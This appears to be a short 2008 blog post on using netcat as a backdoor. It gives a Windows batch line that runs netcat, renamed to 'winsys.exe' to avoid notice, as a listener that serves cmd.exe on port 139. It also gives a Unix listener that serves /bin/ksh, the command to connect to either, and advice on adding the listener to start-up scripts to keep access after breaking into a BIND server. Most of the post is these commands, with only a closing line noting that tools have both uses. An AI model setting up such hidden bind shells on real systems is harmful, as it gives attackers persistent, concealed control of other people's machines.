Wednesday, 27 August 2008

Naughtier Netcat

Netcat can also be used as a backdoor into a system and a remote shell.
Netcat as a Trojan

It seems all too easy....

  • @echo off winsys.exe-L -d -p 139 -t -e cmd.exe

Note that the about command "winsys.exe" is really just "nc.exe" on our Windows host, buit we have simply renamed it. In the process list we have something that is less likely to be discovered.

Once you have run the script on the host that you wish to Trojanise, use telnet to connect to it as follows:

  • #nc-v [ipaddressof target] [port]

On UNIX we can do something similar. The following starts netcat in listen mode.

  • #nc -l -p [port] -e /bin/ksh

Of course, you can listen on either TCP or UDP. In fact, adding this line to a start-up script could allow an attacker to selectively send connections to a valid service or the "Trojan" (see TCPWrappers).

For instance, if an attacker gets shell access through a DNS vulnerability with BIND, the attacker could load a netcat startup and allow future access whilst patching the issue to stop furether attacks (and keep the server for themself).

Even simple tools can be used in both positive and negative ways.

No comments: